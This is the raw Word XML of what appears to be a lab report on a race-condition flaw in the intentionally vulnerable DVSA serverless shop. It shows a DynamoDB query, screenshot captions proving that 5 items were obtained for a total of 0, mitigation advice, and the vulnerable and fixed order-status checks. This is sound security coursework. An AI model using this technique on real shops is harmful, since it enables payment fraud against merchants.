          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>aws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dynamodb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> scan \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D970C67"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--table-name DVSA-ORDERS-DB \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C397D9"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--filter-expression "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>orderId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> = :id" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A51DCC"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--expression-attribute-values '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>{":id":{"S":"'</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"$ORDER_ID"</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2174FD45"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--region us-east-1 | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>jq</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itemList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: .Items[0].</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>itemList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, status: .Items[0].</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>orderStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, total: .Items[0].</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>totalAmount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2024F199" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44553088" w14:textId="24B486A0" w:rsidR="00A52975" w:rsidRDefault="00D278E0">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
          <w:left w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
          <w:bottom w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
          <w:right w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F4F8"/>
        <w:spacing w:before="120" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21431CDF" wp14:editId="16325A07">
            <wp:extent cx="5584825" cy="8229600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1861385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84825" cy="8229600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1333A2DB" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Screenshot 5 — DynamoDB after attack showing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>itemList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">={1:5} while </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>totalAmount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=0, proving the attacker changed quantity to 5 items without paying for them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFB700B" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 5) Evidence and Proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F063095" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The race condition vulnerability is confirmed by the following evidence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B82B51F" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="206B3CCE" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Screenshot 3 proves the initial state: the order had 1 item, status 100 (open), and total 0 before the attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D087CCF" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Screenshot 4 proves the exploit: both billing and update requests were sent simultaneously as background processes, and the update returned cart updated while billing was processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A8E019" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Screenshot 5 proves the impact: after the attack, DynamoDB shows </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>itemList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> changed to 5 items while </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>totalAmount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> remains 0 — the attacker received 5 items while paying for none</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAA0330" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B4915B1" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The key business impact is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD1E531" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An attacker pays for 1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>item</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> but the order is updated to contain 5 items</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585263FD" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>The total amount charged remains 0 (or the original price) while the order quantity is 5x higher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD2BCEB" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>This represents a direct financial fraud attack against the application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA685AD" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>The attack requires only two simultaneous HTTP requests and no special privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2562EC88" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F18D719" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 6) Fix Strategy / Probable Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5700D50A" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The fix requires strengthening the order status check in the DVSA-ORDER-UPDATE Lambda function:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F9BD3E" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68DDE0D7" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Change the status check from &gt; 110 to != 100 so that updates are only allowed when the order is strictly in the open state (status 100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230798D6" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>This ensures that once any payment attempt has started (status 110) or completed (status 120+), the order cannot be modified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757EFF76" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Additionally, implement server-side order locking during billing using DynamoDB conditional writes to prevent concurrent modifications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241B5B23" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Use DynamoDB transactions to make billing and status updates atomic and race-condition safe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48841E90" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F9553C8" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 7) Code / Config Changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBBCE7C" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerable Code — Before Fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ED590B" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The original status check allowed updates at status 100 AND 110:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7DC758" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D557EB2" w14:textId="70BC47BE" w:rsidR="00A52975" w:rsidRDefault="00D278E0">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
          <w:left w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
          <w:bottom w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
          <w:right w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F4F8"/>
        <w:spacing w:before="120" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38137589" wp14:editId="7B100D15">
            <wp:extent cx="5943600" cy="5177790"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="3883850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177790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EA32BB" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Screenshot 6 — Lambda code showing the vulnerable status check: if response[Item][</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>orderStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>] &gt; 110 — this allows updates at status 100 and 110, enabling the race condition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA8EF05" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DE690C5"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VULNERABLE - allows updates during payment attempt (status 110)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414CBC5E"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if response["Item"]["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>orderStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"] &gt; 110:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E34415"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res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status": "err", "msg": "order already </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>paid"}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="24B79C9E"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return </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>res</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="33001BB6" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Fixed Code — After Fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2633E571" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>The fix changes the condition to only allow updates when order is strictly in open state (status 100):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF5EF1A" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08E28420"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FIXED - blocks updates as soon as any payment is attempted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F384A2"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if response["Item"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>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orderStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"] != 100:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D341FDB"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res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status": "err", "msg": "order already </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>paid"}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="13B6E8B5"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return </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>res</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6B0A1A8E" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00A52975">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DA99944" w14:textId="07BAF29A" w:rsidR="00A52975" w:rsidRDefault="00FF1191">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
          <w:left w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
          <w:bottom w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
          <w:right w:val="dashed" w:sz="2" w:space="0" w:color="4A90D9"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F4F8"/>
        <w:spacing w:before="120" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="321A6F76" wp14:editId="13DF5399">
            <wp:extent cx="5943600" cy="5238115"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="186167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238115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E69C441" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Screenshot 7 — Lambda code after fix showing the corrected status check: if response[Item][</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>orderStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>] != 100 — this blocks all updates once the order leaves the open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A52975" w14:paraId="240F7115" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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6A9AE9DF" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="318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540AFE61" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Before Fix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="318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44CDBE6F" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>After Fix</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A52975" w14:paraId="315F88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F71F46A" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Status check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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1BA72C7" w14:textId="77777777" w:rsidR="00A52975" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>&gt; 110</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
